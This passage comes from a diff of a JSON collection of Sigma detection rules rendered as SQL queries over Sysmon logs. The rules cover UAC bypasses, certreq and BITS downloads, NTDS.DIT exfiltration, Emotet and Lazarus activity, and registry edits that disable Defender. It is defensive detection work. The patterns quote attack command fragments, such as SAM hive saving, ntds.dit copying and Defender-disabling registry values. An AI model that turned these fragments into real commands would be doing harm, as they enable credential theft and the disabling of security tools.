'%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_presentationhost_download.yml" + "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" }, { - "title": "GALLIUM IOCs", - "id": "440a56bf-7873-4439-940a-1c8a671073c2", - "status": "test", - "description": "Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.", - "author": "Tim Burrell", + "title": "Suspicious Certreq Command to Download", + "id": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", + "status": "experimental", + "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.command_and_control", - "attack.t1212", - "attack.t1071", - "attack.g0093" + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945%' ESCAPE '\\' OR Hashes LIKE '%SHA256=51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79%' ESCAPE '\\' OR Hashes LIKE '%SHA256=332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08%' ESCAPE '\\' OR Hashes LIKE '%SHA256=63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef%' ESCAPE '\\' OR Hashes LIKE '%SHA256=056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070%' ESCAPE '\\' OR Hashes LIKE '%SHA1=53a44c2396d15c3a03723fa5e5db54cafd527635%' ESCAPE '\\' OR Hashes LIKE '%SHA1=9c5e496921e3bc882dc40694f1dcc3746a75db19%' ESCAPE '\\' OR Hashes LIKE '%SHA1=aeb573accfd95758550cf30bf04f389a92922844%' ESCAPE '\\' OR Hashes LIKE '%SHA1=79ef78a797403a4ed1a616c68e07fff868a8650a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4f6f38b4cec35e895d91c052b1f5a83d665c2196%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=e841a63e47361a572db9a7334af459ddca11347a%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=c28f606df28a9bc8df75a4d5e5837fc5522dd34d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=2e94b305d6812a9f96e6781c888e48c7fb157b6b%' ESCAPE '\\' OR Hashes LIKE '%SHA1=dd44133716b8a241957b912fa6a02efde3ce3025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=8793bf166cb89eb55f0593404e4e933ab605e803%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a39b57032dbb2335499a51e13470a7cd5d86b138%' ESCAPE '\\' OR Hashes LIKE '%SHA1=41cc2b15c662bc001c0eb92f6cc222934f0beeea%' ESCAPE '\\' OR Hashes LIKE '%SHA1=d209430d6af54792371174e70e27dd11d3def7a7%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1c6452026c56efd2c94cea7e0f671eb55515edb0%' ESCAPE '\\' OR Hashes LIKE '%SHA1=c6b41d3afdcdcaf9f442bbe772f5da871801fd5a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4923d460e22fbbf165bbbaba168e5a46b8157d9f%' ESCAPE '\\' OR Hashes LIKE '%SHA1=f201504bd96e81d0d350c3a8332593ee1c9e09de%' ESCAPE '\\' OR Hashes LIKE '%SHA1=ddd2db1127632a2a52943a2fe516a2e7d05d70d2%' ESCAPE '\\') OR sha256 IN ('9ae7c4a4e1cfe9b505c3a47e66551eb1357affee65bfefb0109d02f4e97c06dd', '7772d624e1aed327abcd24ce2068063da0e31bb1d5d3bf2841fc977e198c6c5b', '657fc7e6447e0065d488a7db2caab13071e44741875044f9024ca843fe4e86b5', '2ef157a97e28574356e1d871abf75deca7d7a1ea662f38b577a06dd039dbae29', '52fd7b90d7144ac448af4008be639d4d45c252e51823f4311011af3207a5fc77', 'a370e47cb97b35f1ae6590d14ada7561d22b4a73be0cb6df7e851d85054b1ac3', '5bf80b871278a29f356bd42af1e35428aead20cd90b0c7642247afcaaa95b022', '6f690ccfd54c2b02f0c3cb89c938162c10cbeee693286e809579c540b07ed883', '3c884f776fbd16597c072afd81029e8764dd57ee79d798829ca111f5e170bd8e', '1922a419f57afb351b58330ed456143cc8de8b3ebcbd236d26a219b03b3464d7', 'fe0e4ef832b62d49b43433e10c47dc51072959af93963c790892efc20ec422f1', '7ce9e1c5562c8a5c93878629a47fe6071a35d604ed57a8f918f3eadf82c11a9c', '178d5ee8c04401d332af331087a80fb4e5e2937edfba7266f9be34a5029b6945', '51f70956fa8c487784fd21ab795f6ba2199b5c2d346acdeef1de0318a4c729d9', '889bca95f1a69e94aaade1e959ed0d3620531dc0fc563be9a8decf41899b4d79', 
'332ddaa00e2eb862742cb8d7e24ce52a5d38ffb22f6c8bd51162bd35e84d7ddf', '44bcf82fa536318622798504e8369e9dcdb32686b95fcb44579f0b4efa79df08', '63552772fdd8c947712a2cff00dfe25c7a34133716784b6d486227384f8cf3ef', '056744a3c371b5938d63c396fe094afce8fb153796a65afa5103e1bffd7ca070') OR sha1 IN ('53a44c2396d15c3a03723fa5e5db54cafd527635', '9c5e496921e3bc882dc40694f1dcc3746a75db19', 'aeb573accfd95758550cf30bf04f389a92922844', '79ef78a797403a4ed1a616c68e07fff868a8650a', '4f6f38b4cec35e895d91c052b1f5a83d665c2196', '1e8c2cac2e4ce7cbd33c3858eb2e24531cb8a84d', 'e841a63e47361a572db9a7334af459ddca11347a', 'c28f606df28a9bc8df75a4d5e5837fc5522dd34d', '2e94b305d6812a9f96e6781c888e48c7fb157b6b', 'dd44133716b8a241957b912fa6a02efde3ce3025', '8793bf166cb89eb55f0593404e4e933ab605e803', 'a39b57032dbb2335499a51e13470a7cd5d86b138', '41cc2b15c662bc001c0eb92f6cc222934f0beeea', 'd209430d6af54792371174e70e27dd11d3def7a7', '1c6452026c56efd2c94cea7e0f671eb55515edb0', 'c6b41d3afdcdcaf9f442bbe772f5da871801fd5a', '4923d460e22fbbf165bbbaba168e5a46b8157d9f', 'f201504bd96e81d0d350c3a8332593ee1c9e09de', 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR OriginalFileName = 'CertReq.exe') AND (CommandLine LIKE '% -Post %' ESCAPE '\\' AND CommandLine LIKE '% -config %' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\windows\\\\win.ini %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_gallium_iocs.yml" + "filename": "proc_creation_win_lolbin_susp_certreq_download.yml" }, { - "title": "Suspicious Workstation Locking via Rundll32", - "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", + "title": "Sysinternals PsService Execution", + "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", "status": "experimental", - "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", - "author": "frack113", + 
"description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + "Legitimate use of PsService by an administrator" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psservice.exe' OR (Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_user32_dll.yml" + "filename": "proc_creation_win_sysinternals_psservice.yml" }, { - "title": "Suspicious CustomShellHost Execution", - "id": "84b14121-9d14-416e-800b-f3b829c5a14d", + "title": "Windows Binary Executed From WSL", + "id": "ed825c86-c009-4014-b413-b76003e33d35", "status": "experimental", - "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "description": "Detects the execution of Windows binaries from within a WSL instance. 
This could be used to masquerade parent-child relationships", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1216" + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image REGEXP '[a-zA-Z]:\\\\' AND CurrentDirectory LIKE '%\\\\\\\\wsl.localhost%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_customshellhost.yml" + "filename": "proc_creation_win_wsl_windows_binaries_execution.yml" }, { - "title": "Suspicious Process Patterns NTDS.DIT Exfil", - "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", + "title": "PUA - DefenderCheck Execution", + "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", "status": "experimental", - "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. 
It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1027.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" ], - "filename": "proc_creation_win_susp_ntds.yml" + "filename": 
"proc_creation_win_pua_defendercheck.yml" }, { - "title": "Potential Emotet Rundll32 Execution", - "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "title": "Monitoring For Persistence Via BITS", + "id": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "status": "test", - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "author": "FPT.EagleEye", + "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND CommandLine LIKE '%/SetNotifyCmdLine%' ESCAPE '\\' AND (CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\')) OR (CommandLine LIKE '%bitsadmin%' ESCAPE '\\' AND 
CommandLine LIKE '%/Addfile%' ESCAPE '\\' AND (CommandLine LIKE '%http:%' ESCAPE '\\' OR CommandLine LIKE '%https:%' ESCAPE '\\' OR CommandLine LIKE '%ftp:%' ESCAPE '\\' OR CommandLine LIKE '%ftps:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" + "filename": "proc_creation_win_bitsadmin_potential_persistence.yml" }, { - "title": "Lazarus Group Activity", - "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "title": "HackTool - SILENTTRINITY Stager Execution", + "id": "03552375-cc2c-4883-bbe4-7958d5a980be", "status": "test", - "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects SILENTTRINITY stager use via PE metadata", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.g0032", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unlikely" ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' 
AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_apt_lazarus_group_activity.yml" - }, - { - "title": "Reg Disable Security Service", - "id": "5e95028c-5229-4214-afae-d653d573d0ec", - "status": "experimental", - "description": "Detects a suspicious reg.exe invocation that looks as if it would disable an important security service", - "author": "Florian Roth (Nextron Systems), John Lambert (idea), elhoim", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unknown", - "Other security solution installers" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') AND ((CommandLine LIKE '% /d 4%' ESCAPE '\\' AND CommandLine LIKE '% /v Start%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Sense%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsMpSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\NisSrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdBoot%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisDrv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wscsvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SecurityHealthService%' ESCAPE '\\' OR CommandLine LIKE '%\\\\wuauserv%' ESCAPE '\\' OR CommandLine LIKE '%\\\\UsoSvc%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WdFilter%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppIDSvc%' ESCAPE '\\')) OR (CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Windows Defender%' ESCAPE '\\' AND (CommandLine LIKE '%DisableIOAVProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableOnAccessProtection%' ESCAPE '\\' OR CommandLine LIKE 
'%DisableRoutinelyTakingAction%' ESCAPE '\\' OR CommandLine LIKE '%DisableScanOnRealtimeEnable%' ESCAPE '\\' OR CommandLine LIKE '%DisableBlockAtFirstSeen%' ESCAPE '\\' OR CommandLine LIKE '%DisableBehaviorMonitoring%' ESCAPE '\\' OR CommandLine LIKE '%DisableEnhancedNotifications%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpyware%' ESCAPE '\\' OR CommandLine LIKE '%DisableAntiSpywareRealtimeProtection%' ESCAPE '\\' OR CommandLine LIKE '%DisableConfig%' ESCAPE '\\' OR CommandLine LIKE '%DisablePrivacyMode%' ESCAPE '\\' OR CommandLine LIKE '%SignatureDisableUpdateOnStartupWithoutEngine%' ESCAPE '\\' OR CommandLine LIKE '%DisableArchiveScanning%' ESCAPE '\\' OR CommandLine LIKE '%DisableIntrusionPreventionSystem%' ESCAPE '\\' OR CommandLine LIKE '%DisableScriptScanning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_disable_sec_services.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "WmiPrvSE Spawned PowerShell", - "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", - "status": "stable", - "description": "Detects Powershell as a child of the WmiPrvSE process. 
Which could be a signe of remote access via WMI", - "author": "Markus Neis @Karneades", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", + "status": "experimental", + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1047", - "attack.t1059.001" + "attack.persistence", + "attack.t1059" ], "falsepositives": [ - "AppvClient", - "CCM" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll'))) AND NOT ((CommandLine = 'null') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" + "filename": 
"proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "Suspicious Process Parents", - "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", "status": "experimental", - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" - ], - "filename": "proc_creation_win_susp_parents.yml" - }, - { - "title": "New User Created Via Net.EXE", - "id": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", - "status": "test", - "description": "Identifies the creation of local users via the net.exe command.", - "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate user creation.", - "Better use event IDs for user creation 
rather than command line rules." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_net_user_add.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Use of W32tm as Timer", - "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "title": "Nslookup PowerShell Download Cradle - ProcessCreation", + "id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "status": "experimental", - "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", - "author": "frack113", + "description": "Detects suspicious powershell download cradle using nslookup. 
